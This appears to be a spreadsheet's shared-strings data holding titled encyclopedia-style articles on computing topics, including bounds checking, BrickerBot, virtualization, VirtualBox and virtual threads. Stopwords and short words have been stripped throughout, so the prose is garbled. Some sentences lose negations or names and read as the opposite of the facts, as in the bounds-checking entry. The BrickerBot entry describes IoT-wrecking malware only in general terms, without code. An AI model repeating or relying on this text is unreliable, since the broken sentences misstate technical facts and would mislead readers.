  <si>
    <t>Bounds checking</t>
  </si>
  <si>
    <t>computer programming, bounds checking method detecting whether variable within bounds used. usually used ensure number fits given type (range checking), variable used array index within bounds array (index checking). failed bounds check usually results generation sort exception signal. because performing bounds checking every usage time-consuming, always done. bounds-checking elimination compiler optimization technique eliminates unneeded bounds checking. range checking range check check make sure number within certain range; example, ensure value assigned 16-bit integer within capacity 16-bit integer (i.e. checking wrap-around). this quite type checking. other range checks restrictive; example, variable hold number calendar month declared accept range index checking index checking means that, expressions indexing array, index value checked bounds array (which established array defined), index out-of-bounds, execution suspended sort error. because reading especially writing value outside bounds array cause program malfunction crash enable security vulnerabilities (see buffer overflow), index checking part many high-level languages. early compiled programming languages index checking ability included algol algol pascal, well interpreted programming languages basic. many programming languages, never perform automatic bounds checking raise speed. however, leaves many off-by-one errors buffer overflows uncaught. many programmers believe languages sacrifice much rapid execution. 1980 turing award lecture, hoare described experience design algol language included bounds checking, saying: consequence principle every occurrence every subscript every subscripted variable every occasion checked time upper lower declared bounds array. many years later asked customers whether wished provide option switch checks interest efficiency production runs. unanimously, urged to—they already knew frequently subscript errors occur production runs failure detect could disastrous. note fear horror even 1980, language designers users learned lesson. respectable branch engineering, failure observe elementary precautions would long law. mainstream languages enforce time checking include ada, haskell, java, javascript, lisp, php, python, ruby, rust, visual basic. ocaml languages time bounds checking enabled disabled compiler switch. time checking part language, part enabled compiler switch (_glibcxx_debug=1 _libcpp_debug=1). also supports unsafe regions: sections code (among things) temporarily suspend bounds checking raise efficiency. these useful speeding small time-critical bottlenecks without sacrificing safety whole program. js++ programming language able analyze array index out-of-bounds compile time using existent types, nominal type describing whether index within-bounds out-of-bounds guides code generation. existent types shown overhead compile times. hardware bounds checking safety added bounds checking necessarily costs time checking performed software; however, checks could performed hardware, safety provided "for free" runtime cost. early system hardware bounds checking 2900 series mainframe announced 1974. computer index assembly instruction array index checking takes operands, addressing mode. b6500 similar burroughs computers performed bound checking hardware, irrespective computer language compiled produce machine code. limited number later cpus specialised instructions checking bounds, e.g., chk2 instruction motorola 68000 series. research underway since least 2005 regarding methods x86's built-in virtual memory management unit ensure safety array buffer accesses. 2015 intel provided intel extensions skylake processor architecture stores bounds register table memory. early 2017 least supports extensions. also dynamic code analysis runtime error detection static code analysis references external links advantages tagged architecture”, ieee transactions computers, volume c-22, number july, 1973. “the emperor’s clothes archived 2017-10-02 wayback machine”, 1980 turing award lecture, cacm volume number february 1981, 75–83. “bcc: runtime checking programs”, samuel kendall, proceedings usenix summer 1983 conference. “bounds checking richard jones paul kelly, imperial college, july 1995. “clearpath enterprise servers security overview”, unisys, april 2006. “secure virtual architecture: safe execution environment commodity operating systems”, john criswell, andrew lenharth, dinakar dhurjati, vikram adve, sosp'07 21st symposium operating systems principles, 2007. “fail-safe yutaka oiwa. implementation memory-safe full ansi-c compiler. sigplan conference programing language design implementations (pldi2009), june 2009. “address-sanitizer”, timur iskhodzhanov, alexander potapenko, alexey samsonov, kostya serebryany, evgeniy stepanov, dmitriy vyukov, llvm meeting, november 2011. safe library bounded apis "the safe library". dobb's journal. february 2009. archived original december 2013. retrieved november 2012. safe api—concise solution buffer overflow, owasp foundation, owasp appsec, beijing 2011 library manual macros libc++ 11.0 documentation debug mode</t>
  </si>
  <si>
    <t>Bounds-checking elimination</t>
  </si>
  <si>
    <t>computer science, bounds-checking elimination compiler optimization useful programming languages runtime systems enforce bounds checking, practice checking every index array verify index within defined valid range indexes. goal detect indexing operations need validated runtime, eliminating checks. common example accessing array element, modifying storing modified value array location. normally, example would result bounds check element read array second bounds check modified element stored using array index. bounds-checking elimination could eliminate second check compiler runtime determine neither array size index could change array operations. another example occurs programmer loops elements array, loop condition guarantees index within bounds array. difficult detect programmer's manual check renders automatic check redundant. however, still possible compiler runtime perform proper bounds-checking elimination case. implementations natively compiled languages technique bounds-checking elimination typed static single assignment form representation array create type representing safe index particular array. first value array index results runtime type cast (and appropriate check), subsequently safe index value used without type cast, without sacrificing correctness safety. jit-compiled languages just-in-time compiled languages java often check indexes runtime accessing arrays. some just-in-time compilers hotspot able eliminate checks discover index always within correct range, earlier check would already thrown exception. references external links amme, ronne, franz. using safetsa representation boost performance existing java virtual machine (2002).</t>
  </si>
  <si>
    <t>Box Backup</t>
  </si>
  <si>
    <t>backup open-source, completely automatic online backup system. client software sends backup data server. data encrypted using secure sockets layer (ssl) protocol also protected layer on-disk encryption.box backup supports linux, unix, windows, backup clients servers (although windows servers recommended authors). backup licensed licenses. introduction backup client-server application client sends data server storage. server provides management client certificates, storage quotas, data retention. together, unique robust solution created scales allowing clients low-bandwidth connections effectively perform reliable backups. backup ideal backing laptops computers intermittent low-bandwidth connections, capable continuous data protection background, starting automatically internet connection present, recovering gracefully efficiently connection failures.box backup uses modified version rsync algorithm, works encrypted blocks. this allows store data server form server operator cannot read, still uploading changed portions data files. references external links backup official site</t>
  </si>
  <si>
    <t>Bozo bit</t>
  </si>
  <si>
    <t>term bozo used contexts. initially weak copy protection system 1980s apple classic term "flipping bozo bit" later reused describe decision ignore person's input. whimsical term, possibly derived classic children's comedy character, bozo clown. weak copy protection early versions apple's classic "bozo bit" flags finder information record (also called copy" flag documentation), described various file attributes. when set, file could copied. called bozo copy protection weak bozo would think bozo would deterred after system introduced early 1987, finder ignored bit.the cassette filing systems advanced disc filing system acorn feature rudimentary copy protection mechanism file certain flag cannot loaded except execute compact disc similar copy" subcode, nearly disc-copying software ignores usually removes copies. consumer-grade dedicated hardware audio disc copiers usually honor bozo bit, refuse copy disc set. professional disc copiers ignore bozo copy protected disc. dismissing person worth listening 1995 book dynamics software development, presented series rules political interpersonal forces drive software development, mccarthy applied bozo notion realm human interaction. technical issues facing programmers sufficiently daunting getting code written commonly considered good enough; mccarthy authors (lister demarco, constantine, mcconnell) breaking news social issues trump technical ones almost every project. mccarthy's rule "don't flip bozo bit". mccarthy's advice everyone something contribute easy tempting, someone ticks person mistaken both), simply disregard input future setting "bozo flag" true person. taking lazy out, person poisons team interactions cannot avail help "bozo" ever again. also bozo clown evil references external links setting bozo antipattern</t>
  </si>
  <si>
    <t>BrickerBot</t>
  </si>
  <si>
    <t>brickerbot malware attempted permanently destroy ("brick") insecure internet things devices. brickerbot logged poorly-secured devices harmful commands disable them. first discovered radware attacked honeypot april 2017. december 2017, brickerbot retired. discovery brickerbot.1 brickerbot.2 brickerbot family malware first discovered radware april 2017, brickerbot attacked honeypot 1,895 times four days. brickerbot's method attack brute-force telnet password, commands using busybox corrupt storage, delete files, disconnect device internet. less hour initial attack, bots began sending slightly different malicious commands, indicating version, brickerbot.2. brickerbot.2 used network hide location, rely presence busybox target, able corrupt types storage devices. brickerbot.3 brickerbot.4 brickerbot.3 detected 2017, month initial discovery brickerbot.1. day, device identified brickerbot.4 bot. instances brickerbot.4 seen since. shutdown impact according janit0r, author brickerbot, destroyed million devices janit0r announced retirement brickerbot december 2017. interview bleeping computer, janit0r stated brickerbot intended prevent devices infected mirai. us-cert released alert regarding brickerbot april 2017. references</t>
  </si>
  <si>
    <t>Virtual application</t>
  </si>
  <si>
    <t>virtual application application optimized virtual infrastructure. application software along enough operating system (jeos "juice") combined inside virtual machine container manner maximizes performance application. minimizing system software smallest packages required support application, maintenance administration burden virtual application greatly reduced. including application streaming design application server capable hosting virtual application, application specific code need reside server all. packages code reside server, details invoked order create functionality adds application, gets passed server needed. effect application exist server all. though clients still invoke almost did. difference incoming request must either include application logic exploiting code packages server), information locate logic repository. virtual appliances category virtual applications optimized simplified setup configuration customer remote management application vendor. also application virtualization microsoft app-v turbo (software) just enough operating system virtual appliance rpath application streaming green computing</t>
  </si>
  <si>
    <t>Virtutech</t>
  </si>
  <si>
    <t>virtutech company founded 1998 spin-off swedish institute computer science (sics), commercially develop simics computer architecture simulator software. 2004, virtutech accepted investment moved headquarters jose, california, usa. 2010, virtutech wholly acquired intel became part intel's wind river subsidiary. 2018, wind river sold capital, continues develop simics wind river brand. stockholm site remains center simics r&amp;d. simics software used teams software developers simulate computer systems. this facilitates development, testing, debugging embedded software runs devices high-end servers, network hardware, aerospace/military vehicles, automobiles. simics allows embedded software developers create virtual models hardware using ordinary desktop computer, specified sets tests, walk programs step execution, forwards backwards. history 2001, virtutech began working collaboratively simulation amd's hammer chips. july 2005, selected virtutech simics development power6 platform. 2007, virtutech freescale announced collaboration program around multicore processors. virtutech thus appears customer base partly embedded software world, partly general computing server world. virtutech member power.org. embedded systems become complex, especially advent multiprocessors, become increasingly difficult develop debug embedded software without specialized tools. virtutech's idea provide tools allow developers develop software faster would using hardware traditional development methods. particular, modeling complex hardware system using software running ordinary workstation computer, virtutech claims reduce challenge embedded software development.on february 2010, intel announced acquired virtutech simics maintained intel's subsidiary wind river systems. price acquisition $45m. references times virtutech system-level simulator features hindsight technology virtual strategy magazine john lambert virtutech present future slashdot hindsight: reversible computing notes external links virtutech simics</t>
  </si>
  <si>
    <t>Virtuozzo (company)</t>
  </si>
  <si>
    <t>virtuozzo privately held software company, specializing virtualization software. divested parallels company 2016. virtuozzo developed first commercially available operating system-level virtualization container technology 2000 open-sourced 2005 form openvz. company history company founded 1997 name swsoft maintained headquarters herndon, virginia additional offices throughout north america, europe, asia. research development offices located moscow, russia, sales offices germany singapore. january 2002, virtuozzo containers virtualization solution released. 2003, swsoft acquired makers confixx plesk hosting products, expanded presence germany novosibirsk, russia. december 2007, acquisition parallels, inc., swsoft company announced plans change name parallels distribute products parallels brand name.in december 2015, virtuozzo spun became standalone company, entrepreneur former parallels exec lovell. 2016, virtuozzo announced intention join open container initiative plans develop dedicated cloud-based servers well specialized linux distribution. that month, virtuozzo launched virtuozzo application catalog, developed partnership bitnami. virtuozzo announced strategic partnership jelastic august 2016 produce virtuozzo devops, application orchestration platform aimed large size companies. company named alex fine november 2018. fine previously held senior roles cloudblue, ingram micro cloud, odin parallels.in april 2017, virtuozzo partnered packet.net distribute virtuozzo software packet. software virtuozzo operating system-level server virtualization solution designed centralize server management consolidate workloads reducing number physical servers required. organizations virtuozzo server consolidation, disaster recovery, server workload agility. virtuozzo generate virtual machine host like traditional software, instead, creates isolated virtual private servers (vpss) single physical server. instance, software multiple linux vpss, linux windows time server. each performs exactly like stand-alone server rebooted independently.virtuozzo linux became available 2001 version supports 64-bit microprocessors became available 2005. 2002, virtuozzo proved version software could 2,500 instances linux eight-processor dell server. result, intel partnered virtuozzo 2002 develop partitioning technology ia-64 processors.linux architectures support virtuozzo linux x86, ia64, amd64, em64t, itanium. virtuozzo linux enables multiple linux distributions exist simultaneously server. based openvz, linux-based os-level virtualization technology, allows physical server multiple isolated operating system instances. 2005, company updated virtuozzo support 64-bit processors. virtuozzo requires least pentium server least memory available hard drive. virtuozzo's management tools compatible microsoft's viridian virtual server software. virtuozzo's container staging processed company's container platform openvz. virtuozzo incorporated optimized kernel-based virtual machine, released july 2016.in 2012, company released virtuozzo storage, targeted container storage. second version virtuozzo storage released 2017. references</t>
  </si>
  <si>
    <t>Virtualization</t>
  </si>
  <si>
    <t>computing, virtualization virtualisation (sometimes abbreviated v12n, numeronym) creating virtual (rather actual) version something abstraction level, including virtual computer hardware platforms, storage devices, computer network resources. virtualization began 1960s, method logically dividing system resources provided mainframe computers different applications. early successful example cp/cms. control program provided user simulated stand-alone system/360 computer. since then, meaning term broadened. hardware virtualization hardware virtualization platform virtualization refers creation virtual machine acts like real computer operating system. software executed virtual machines separated underlying hardware resources. example, computer running arch linux host virtual machine looks like computer microsoft windows operating system; windows-based software virtual machine.in hardware virtualization, host machine machine used virtualization guest machine virtual machine. words host guest used distinguish software runs physical machine software runs virtual machine. software firmware creates virtual machine host hardware called hypervisor virtual machine monitor. different types hardware virtualization include: full virtualization almost complete simulation actual hardware allow software environments, including guest operating system apps, unmodified. paravirtualization guest apps executed isolated domains, running separate system, hardware environment simulated. guest programs need specifically modified environment.hardware-assisted virtualization improving overall efficiency virtualization. involves cpus provide support virtualization hardware, hardware components help improve performance guest environment. hardware virtualization viewed part overall trend enterprise includes autonomic computing, scenario environment able manage based perceived activity, utility computing, computer processing power seen utility clients needed. usual goal virtualization centralize administrative tasks improving scalability overall hardware-resource utilization. with virtualization, several operating systems parallel single central processing unit (cpu). this parallelism tends reduce overhead costs differs multitasking, involves running several programs using virtualization, enterprise better manage updates rapid changes operating system applications without disrupting user. "ultimately, virtualization dramatically improves efficiency availability resources applications organization. instead relying model “one server, application” leads underutilized resources, virtual resources dynamically applied meet business needs without excess fat" (consonustech). hardware virtualization hardware emulation. hardware emulation, piece hardware imitates another, hardware virtualization, hypervisor piece software) imitates particular piece computer hardware entire computer. furthermore, hypervisor emulator; computer programs imitate hardware, domain language differs. snapshots snapshot state virtual machine, generally storage devices, exact point time. snapshot enables virtual machine's state time snapshot restored later, effectively undoing changes occurred afterwards. this capability useful backup technique, example, prior performing risky operation. virtual machines frequently virtual disks storage; simple example, 10-gigabyte hard disk drive simulated 10-gigabyte flat file. requests location physical disk transparently translated operation corresponding file. once translation layer present, however, possible intercept operations send different files, depending various criteria. every time snapshot taken, file created, used overlay predecessors. data written topmost overlay; reading existing data, however, needs overlay hierarchy scanned, resulting accessing recent version. thus, entire stack snapshots virtually single coherent disk; sense, creating snapshots works similarly incremental backup technique. other components virtual machine also included snapshot, contents random-access memory (ram), bios settings, configuration settings. "save state" feature video game console emulators example snapshots. restoring snapshot consists discarding disregarding overlay layers added snapshot, directing changes overlay. migration snapshots described moved another host machine hypervisor; temporarily stopped, snapshotted, moved, resumed host, known migration. older snapshots kept sync regularly, operation quite fast, allow provide uninterrupted service prior physical host example, taken physical maintenance. failover similar migration mechanism described above, failover allows continue operations host fails. generally occurs migration stopped working. however, case, continues operation last-known coherent state, rather current state, based whatever materials backup server last provided with. video game console emulation video game console emulator program allows personal computer video game console emulate different video game console's behavior. video game console emulators hypervisors perform hardware virtualization; words like "virtualization", "virtual machine", "host" "guest" used conjunction console emulators. nested virtualization nested virtualization refers ability running virtual machine within another, general concept extendable arbitrary depth. words, nested virtualization refers running hypervisors inside another hypervisor. nature nested guest virtual machine need homogeneous host virtual machine; example, application virtualization deployed within virtual machine created using hardware virtualization.nested virtualization becomes necessary widespread operating systems gain built-in hypervisor functionality, virtualized environment used surrounding hypervisor supports nested virtualization; example, windows capable running windows applications inside built-in virtual machine. furthermore, moving already existing virtualized environments cloud, following infrastructure service (iaas) approach, much complicated destination iaas platform support nested virtualization.the nested virtualization implemented particular computer architecture depends supported hardware-assisted virtualization capabilities. particular architecture provide hardware support required nested virtualization, various software techniques employed enable over time, architectures gain required hardware support; example, since haswell microarchitecture (announced 2013), intel started include vmcs shadowing technology accelerates nested virtualization. licensing virtual machines running proprietary operating systems require licensing, regardless host machine's operating system. example, installing microsoft windows guest requires licensing requirements satisfied. desktop virtualization desktop virtualization concept separating logical desktop physical machine. form desktop virtualization, virtual desktop infrastructure (vdi), thought advanced form hardware virtualization. rather interacting host computer directly keyboard, mouse, monitor, user interacts host computer using another desktop computer mobile device means network connection, lan, wireless even internet. addition, host computer scenario becomes server computer capable hosting multiple virtual machines time multiple users.as organizations continue virtualize converge data center environment, client architectures also continue evolve order take advantage predictability, continuity, quality service delivered converged infrastructure. example, companies like provide hybrid model range virtualization software delivery models improve upon limitations distributed client computing. selected client environments move workloads devices data center servers, creating well-managed virtual clients, applications client operating environments hosted servers storage data center. users, means access desktop location, without tied single client device. since resources centralized, users moving work locations still access client environment applications data. administrators, means centralized, efficient client environment easier maintain able quickly respond changing needs user business. another form, session virtualization, allows multiple users connect shared powerful computer network simultaneously. each given desktop personal folder store files. with multiseat configuration, session virtualization accomplished using single multiple monitors, keyboards, mice connected. thin clients, seen desktop virtualization, simple and/or cheap computers primarily designed connect network. they lack significant hard disk storage space, even processing power, many organizations beginning look cost benefits eliminating “thick client” desktops packed software (and require software licensing fees) making strategic investments. desktop virtualization simplifies software versioning patch management, image simply updated server, desktop gets updated version reboots. also enables centralized control applications user allowed access workstation. moving virtualized desktops cloud creates hosted virtual desktops (hvds), desktop images centrally managed maintained specialist hosting firm. benefits include scalability reduction capital expenditure, replaced monthly operational cost. containerization operating-system-level virtualization, also known containerization, refers operating system feature kernel allows existence multiple isolated user-space instances. such instances, called containers, partitions, virtual environments (ves) jails (freebsd jail chroot jail), look like real computers point view programs running them. computer program running ordinary operating system resources (connected devices, files folders, network shares, power, quantifiable hardware capabilities) computer. however, programs running inside container container's contents devices assigned container. containerization started gaining prominence 2014, introduction docker. other types softwareapplication virtualization workspace virtualization: isolating individual apps underlying apps; closely associated concept portable applications service virtualization: emulating behavior specific components heterogeneous component-based applications api-driven applications, cloud-based applications service-oriented architecturesmemorymemory virtualization: aggregating random-access memory (ram) resources networked systems single memory pool virtual memory: giving impression contiguous working memory, isolating underlying physical memory implementationstoragestorage virtualization: process completely abstracting logical storage physical storage distributed file system: file system allows access files multiple hosts sharing computer network virtual file system: abstraction layer concrete file system, allowing client applications access different types concrete file systems uniform storage hypervisor: software manages storage virtualization combines physical storage resources flexible pools logical storage virtual disk: computer program emulates disk drive hard disk drive optical disk drive (see comparison disc image software)datadata virtualization: presentation data abstract layer, independent underlying database systems, structures storage database virtualization: decoupling database layer, lies storage application layers within application stack allnetworknetwork virtualization: creation virtualized network addressing space within across network subnets virtual private network (vpn): network protocol replaces actual wire physical media network abstract layer, allowing network created internet network protocol virtualization: decoupling networking layers order accelerate deployment management networks also references external links introduction virtualization, january 2004, amit singh</t>
  </si>
  <si>
    <t>VirtualBox</t>
  </si>
  <si>
    <t>oracle virtualbox (formerly virtualbox, virtualbox innotek virtualbox) type-2 hypervisor virtualization developed oracle corporation. virtualbox originally created innotek gmbh, acquired microsystems 2008, turn acquired oracle 2010. virtualbox installed microsoft windows, macos, linux, solaris opensolaris. there also ports freebsd genode. supports creation management guest virtual machines running windows, linux, bsd, os/2, solaris, haiku, osx86, well limited virtualization macos guests apple hardware. guest operating systems, "guest additions" package device drivers system applications available, typically improves performance, especially graphics, allows changing resolution guest automatically window virtual machine host resized.released terms general public license and, optionally, cddl files source distribution, virtualbox free open-source software, though extension pack proprietary software. history virtualbox first offered innotek gmbh weinstadt, germany, proprietary software license, making version product available cost personal evaluation use, subject virtualbox personal evaluation license (puel). january 2007, based counsel lisog, innotek gmbh released virtualbox open source edition (ose) free open-source software, subject requirements general public license (gpl), version 2.innotek gmbh also contributed development os/2 linux support virtualization os/2 ports products connectix later acquired microsoft. specifically, innotek developed "additions" code windows virtual microsoft virtual server, enables various host–guest interactions like shared clipboards dynamic viewport resizing. microsystems acquired innotek february 2008.following acquisition microsystems oracle corporation january 2010, product re-branded "oracle virtualbox".in december 2019, virtualbox started supporting hardware-assisted virtualization, dropping support software-based one. release history version server guest support experimental memory ballooning (not available solaris hosts) deduplication (page fusion) windows guests 64-bit hosts hot-plugging linux (hot-add hot-remove) certain windows guests (hot-add only) deleting snapshots running multi-monitor guest setups gui, windows guests logic controller emulation remote desktop protocol (rdp) video acceleration non-free extension control guest applications host automated software deploymentsversion puel/ose separation abandoned favor open source base product closed source extension pack installed base product. part change, additional components virtualbox made open source (installers, documentation, device drivers) intel audio codec emulation intel ich9 chipset emulation storage scheme data stored single folder improve portability several enhancements including look preview scale mode 32-bit hosts, addition ovf, single file format supported bandwidth limited support apple images (dvd) multi-monitor guest setups linux/solaris guests (previously windows only) resizing disk image formats oracle, (virtualbox disk image), microsoft, (virtual hard disk)version windows aero support (experimental) virtual machine cloningversion virtual machine groups allows management group virtual machines single unit (power off, take snapshots, etc.) some settings altered execution support nics case ich9 chipset support limiting network bandwidth automatically host system startup (except windows hosts)version video-capture support host touch device support (gui passes host touch events guest)/usb virtualization devicesversion paravirtualization support windows linux guests improve time-keeping accuracy performance usb3 controller based intel's hardware implementation. supported windows version starting windows linux kernel starting 2.6.31 starting version 10.7.4. bidirectional drag drop support windows, linux solaris guests disk image encryption non-free extension output scaling hidpi displays support hotplugging sata disks using traffic capturing disconnected session background avx, avx-2, aes-ni, 4.1/4.2 instructions supported host cpu)version support exporting virtual machines oracle cloud file manager allows control guest file system copy files from/to vmsvga driver linux hosts surround speakers setup support support hardware-assisted nested virtualization cpusversion support importing virtual machines oracle cloud added nested virtualization support intel cpus already available cpus) starting intel core broadwell experimental support file transfers drag-n-drop windows host guests (disabled default, must enabled using vboxmanage) support virtio-scsi hard disks optical drives, including boot support support hosts 1024 cpus dxva (hardware accelerated video decoding) support windows guests nvram support improves compatibility many guest oses software keyboard entering keys guest guest monitoring dropped support software virtualization: hardware virtualization support required dropped support passthrough linux hosts soft (virtual) keyboardversion development) secure boot support guest operating systems module virtualization users virtualbox load multiple guest oses single host operating-system (host os). each guest started, paused stopped independently within virtual machine (vm). user independently configure choice software-based virtualization hardware assisted virtualization underlying host hardware supports this. host guest applications communicate number mechanisms including common clipboard virtualized network facility. guest also directly communicate configured hardware-assisted virtualbox supports intel's vt-x amd's amd-v hardware-assisted virtualization. making facilities, virtualbox guest separate address-space; guest ring code runs host ring non-root mode rather ring 1.starting version 6.1, virtualbox supports method. until then, virtualbox specifically supported guests (including 64-bit guests, guests certain proprietary oss) hosts hardware-assisted virtualization. devices peripherals virtualbox emulates hard disks three formats: native (virtual disk image), vmdk vmware microsoft windows. thus supports disks created hypervisor software. virtualbox also connect iscsi targets partitions host, using either virtual hard disks. virtualbox emulates (piix4 ich6 controllers), scsi, sata (ich8m controller) controllers hard drives attached. virtualbox supported open virtualization format (ovf) since version 2.2.0 (april 2009).both images physical devices connected host mounted drives. virtualbox supports running operating systems live dvds. default, virtualbox provides graphics support custom virtual graphics-card uefi compatible. guest additions windows, linux, solaris, opensolaris, os/2 guests include special video-driver increases video performance includes additional features, automatically adjusting guest resolution resizing window desktop composition virtualized wddm drivers ethernet network adapter, virtualbox virtualizes network interface cards: pcnet (am79c970a) pcnet-fast (am79c973) intel pro/1000 desktop (82540em) intel pro/1000 server (82545em) intel pro/1000 server (82543gc) paravirtualized network adapter (virtio-net)the emulated network cards allow guest without need find install drivers networking hardware shipped part guest special paravirtualized network adapter also available, improves network performance eliminating need match specific hardware interface, requires special driver support guest. (many distributions linux ship driver included.) default, virtualbox uses internet software end-users firefox operate. bridged networking host network adapter virtual networks guests also configured. network adapters attached simultaneously, four configurable graphical interface. sound card, virtualbox virtualizes intel audio, intel ac'97 soundblaster devices.a controller emulated devices attached host seen guest. proprietary extension pack adds controllers and, virtualbox acts server, also devices remote client connected host, although client supports virtualbox-specific extension (oracle provides clients solaris, linux thin clients this, promised support platforms future versions). software-based absence hardware-assisted virtualization, versions earlier virtualbox could adopt standard software-based virtualization approach. this mode supports 32-bit guest rings intel ring architecture. system reconfigures guest code, would normally ring execute ring host hardware. because code contains many privileged instructions cannot natively ring virtualbox employs code scanning analysis manager (csam) scan ring code recursively first execution identify problematic instructions calls patch manager (patm) perform in-situ patching. this replaces instruction jump vm-safe equivalent compiled code fragment hypervisor memory. guest user-mode code, running ring generally runs directly host hardware ring 3.in cases, virtualbox uses csam patm inspect patch offending instructions whenever fault occurs. virtualbox also contains dynamic recompiler, based qemu recompile real mode protected mode code entirely (e.g. bios code, guest, operating system startup).using techniques, virtualbox achieve performance comparable vmware.the feature dropped starting virtualbox 6.1. features snapshots storage allow reverting prior state. screenshots screen video capture "host key" releasing keyboard mouse cursor host system captured (coupled) guest system, keyboard shortcuts features configuration, restarting, screenshot. default, right-side ctrl key. mouse pointer integration, meaning automatic coupling uncoupling mouse cursor moved inside outside virtual screen, supported guest operating system. seamless mode ability virtualized applications side side normal desktop applications shared clipboard shared folders "guest additions" software special drivers utilities facilitate switching systems ability specify amount shared ram, video memory, execution ability emulate multiple screens command line interaction addition gui) public (java, python, soap, xpcom) control configuration execution nested paging amd-v intel (only processors supporting slat slat enabled) limited support graphics acceleration (including opengl (but including) direct3d 9.0c wine's direct3d opengl translation) support virtual cpus virtual machine), since version teleportation (aka live migration) video output acceleration (not mistaken video decoding acceleration), since version supported since version (windows guests supported) storage emulation ability mount virtual hard disk drives disk images. virtual optical disc images used booting sharing files guest systems lacking networking support. support sata, scsi disks partitions sata disk hotplugging pass-through mode solid-state drives pass-through mode cd/dvd/bd drives allows users play audio cds, burn optical disks, play encrypted discs disable host cache allows limitation bandwidth pata, sata, scsi, sas, iscsi, floppy disk controllers disk image encryption using aes128/aes256storage support includes: hard disk access allows physical hard disk partitions host system appear guest system vmware virtual machine disk (vmdk) format support allows exchange disk images vmware microsoft support qemu qcow disks format disks (only version versions supported) used parallels virtualization products limitations graphics acceleration windows guests earlier windows removed version 6.1. this affected windows windows vista. virtualbox transfer rate usb2 devices. despite open source product, features available binary form commercial license (see "virtualbox extension pack" below). cumulative measurement disk reading writing like microsoft virtual usb3 devices pass supported older guest oses like windows vista windows lack drivers however starting version virtualbox offers experimental renesas upd720201 xhci usb3 controller allows usb3 operating systems manual modification configuration files. guest additions macos unavailable time. guest additions windows (windows available. this results poor performance lack graphics acceleration default limited color depth (external third-party software available enable support 32-bit color mode, resulting better performance). support incomplete, e.g. boot windows guest supported. only older versions directx opengl passthrough supported (the feature enabled using acceleration option individually). video limited (256 video acceleration enabled) technical difficulties (merely changing allow user allocate video manually editing configuration file work result fatal error). windows 95/98/98se/me cannot installed work unreliably modern cpus (amd newer; intel tiger lake newer) hardware assisted virtualization (virtualbox higher). this oses coded correctly. open source patch developed issue also addresses windows 95/98/98se makes system crash running fast cpus. virtualbox (currently available development snapshot) later required pristine windows guest. host support supported operating systems include: windows higher. support 64-bit windows added virtualbox 1.5. support windows removed virtualbox 5.0. support windows vista removed virtualbox 5.2. windows support removed version 6.1. windows server 2012 higher linux distributions macos version 10.13 high sierra 10.15 catalina (only intel-based macs): preliminary support (beta stage) added virtualbox 1.4, full support 1.6. 10.4 (tiger) support removed virtualbox 3.1. support 10.7 (lion) earlier removed virtualbox 5.0. support 10.8 (mountain lion) removed virtualbox 5.1. support 10.9 (mavericks) removed virtualbox 5.2. "virtualbox manual (archived)". archived original 2018-12-17. support (mac) 10.10 yosemite 10.11 capitan removed virtualbox 6.0. support macos 10.12 sierra officially removed virtualbox 6.1.16 still install run, however) support macos later versions officially provided. users reported various technical issues running virtualbox macos sur. because virtualbox virtualization software, available, planned apple silicon-based macs. oracle solaris guests some features require installation closed-source "virtualbox extension pack": support virtual 2.0/3.0 controller (ehci/xhci) virtualbox rdp: support proprietary remote connection protocol developed microsoft citrix systems. boot intel cards. disk image encryption camera webcam supportwhile virtualbox free distributed open source license virtualbox extension pack licensed virtualbox personal evaluation license (puel). personal free commercial users need purchase license. oracle routinely checks files downloads virtualbox extension pack nonresidential addresses contacts unlicensed users enforce compliance.while guest additions installed within suitable guest virtual machine, extension pack installed host running virtualbox. licensing core package since version december 2010, free software general public license version (gplv2). separate "virtualbox oracle virtualbox extension pack" providing support devices, remote desktop protocol (rdp), disk encryption, nvme preboot execution environment (pxe) boot proprietary license, called personal evaluation license (puel), permits software personal use, educational use, evaluation, free charge. since virtualbox version 5.1.30 oracle defines personal installation software single host computer non-commercial purposes. unlike software using proprietary license, "virtualbox oracle virtualbox extension pack" source-available since includes closed-source components, make source code publicly available.prior version different packages virtualbox software. full package offered gratis puel, licenses commercial deployment purchasable oracle. second package called virtualbox open source edition (ose) released gplv2. this removed proprietary components available gplv2.building bios virtualbox since version requires open watcom compiler, sybase open watcom public license approved "open source" open source initiative "free" free software foundation debian free software guidelines.although virtualbox experimental support macos guests, user license agreement macos permit operating system non-apple hardware, enforced within operating system calls apple system management controller (smc) apple machines, verifies authenticity hardware. derivatives commercial port virtualbox built-in support direct 12.1 vulkan inside virtual machines released main contributor freerdp project, called thincast workstation. also comparison platform virtualization software vmware workstation level virtualization virtualization references external links virtual official website oracle oracle cloud</t>
  </si>
  <si>
    <t>Virtual threads</t>
  </si>
  <si>
    <t>computer programming, virtual threads threads scheduled runtime library instead natively underlying operating system (os). virtual threads allows tens millions preemptive tasks events without swapping 2021 consumer-grade computer.., compared thousands operating system threads. preemptive execution important performance gains parallelism fast preemptive response times tens millions events. earlier constructs preemptive, coroutines largely single-threaded node.js, introduce delays responding asynchronous events every incoming request server application definition term virtual threads used ambiguously years. example intel 2007 spoke hyper-threading hardware virtual threads. virtual threads commercialized google’s chrome browser 2008 virtual threads physical threads. virtual threads truly virtual, created user-space software virtual threads preemptive this important response performance, virtual thread react events without programmer intervention concluding current task preemption requires knowledge multi-threaded programming avoid teared writes, data race invisible writes threads virtual threads execution units processors cores this allows using available hardware, increase today’s computers go1.18 implementation, virtual thread queues execution unit. there additional virtual threads allocated execution unit execution unit steal virtual threads another execution unit virtual threads require yield similar interventions programmer virtual threads appear execute continuously return stop synchronization lock unlike coroutines, virtual thread infinite loop, block program. execution continues higher load, even looping threads available execution units virtual threads exists tens millions featuring small often managed stacks this allows many magnitudes threads using threads 1.18 launch million virtual threads 2021 consumer-grade computer, 350,000 gigabyte main memory. this enabled goroutines resizable, less stack consumer grade computer typically supports 3,000 threads system configuration offer maybe 15,000 virtual threads allocated quickly, similar rate memory allocations because allocating virtual thread akin allocate memory structures, allocated quickly, like 600,000 second. this possible threads would crash host long rate quicker ramp-up lessens need thread-pools pre-launched threads cater sudden increases traffic virtual thread allocated using function call preceded keyword function call provides closure variable values guaranteed visible goroutine. goroutines return value, goroutine returns disappears virtual threads share memory like threads like threads, virtual threads share memory across process therefore freely share access memory objects subject synchronization some single-threaded architectures, ecmascript engine used node.js, readily accept data particular thread allocate, requiring special zero-copy data types used sharing data threads virtual threads offer parallelism like threads parallelism means multiple instructions executed truly time typically leads magnitude faster performance this different simpler concurrency, single execution unit executes multiple threads shared small time increments. sharing makes thread appear continuously executing. while concurrency easier implement program, offer gains performance underlying reasons java servers featured extensive memory consuming software constructs allowing dozens pooled operating system threads preemptively execute thousands requests second without virtual threads. performance reduce initial latency thread processing minimize time operating system 